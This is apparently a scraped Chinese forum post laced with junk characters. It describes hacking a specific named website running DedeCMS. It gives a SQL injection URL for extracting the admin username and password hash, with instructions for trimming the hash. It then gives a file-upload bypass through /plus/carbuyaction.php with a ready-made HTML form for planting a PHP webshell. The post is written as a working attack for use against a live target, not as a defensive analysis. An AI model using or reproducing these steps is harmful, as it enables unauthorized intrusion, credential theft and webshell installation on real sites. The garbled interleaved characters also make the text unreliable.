①注入漏洞。
' \8 Z! I- Y2 M# n3 L这站 http://www.political-security.com/5 N4 L, [+ {1 H. N4 _( @
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
; G; X: s* U1 g5 }www.political-security.com/data/mysql_error_trace.inc 爆后台" n6 G$ W! v- i* \& `4 V' B/ i
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。- H% l z" ?, {3 U( b
然后写上语句 * |6 A0 n; }6 d" |! Z/ N% {5 n* C
查看管理员帐号% \+ u- I2 @% t. e: j
http://www.political-security.co ... &membergroup=@`9 F D) J, U- N
2 R |. @. [5 f0 p/ C, c
admin + }) Q8 s& k& D
. v# }# k+ a+ ~1 }9 w
查看管理员密码
' m' {5 k7 F% `2 Y J" w- |% m http://www.political-security.co ... &membergroup=@`9 i3 c# y" y/ n0 O: D% l+ g( {' f7 H
; m0 o1 d+ R+ F' o) n3 h8d29b1ef9f8c5a5af429* e* @) D' c2 c8 c) T! l! g
8 x7 s% A8 q# X3 u4 z& i5 c查看管理员密码
0 v* [' _+ k2 s8 r4 U4 D/ a- M% S9 P# i/ l, W9 v% E
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# L- X6 L+ O& O. L. p) p, N- z
; c+ J1 ~9 @5 P/ O; f* W
8d2' \+ F3 v" M+ Y( \( ^
9b1ef9f8c5a5af42) A+ g: K; g& ]
9+ A; G1 T% q9 M% m# ?9 F
0 O; n$ v/ p' \% l
cmd5没解出来 只好测试第二个方法1 p2 F: h5 Y- d% T' }
( A6 J% I) E, k3 P# O4 v H9 ]. q: {% `7 g3 D2 K
②上传漏洞:
N& L- r2 [; E
# a5 Z2 |$ G/ C; Z7 U# H) f6 C只要登陆会员中心,然后访问页面链接
/ O N% y* b8 t" T+ T# C8 j2 t“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”0 _( s/ p7 i( ~' S* O. s$ p: j
# s9 {% f! i; k( h+ }1 W如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
# `4 d r$ t4 O9 l9 P0 Z" a) F% L5 c
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm6 T+ L- m3 l7 |5 |7 O* e* R
3 Z% r7 R% ~& Z+ L; ~6 p<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
1 a+ g* b- T3 D: ^2 m# ^& Q或者( s4 Q" u' H0 V; J) S
即可上传成功 |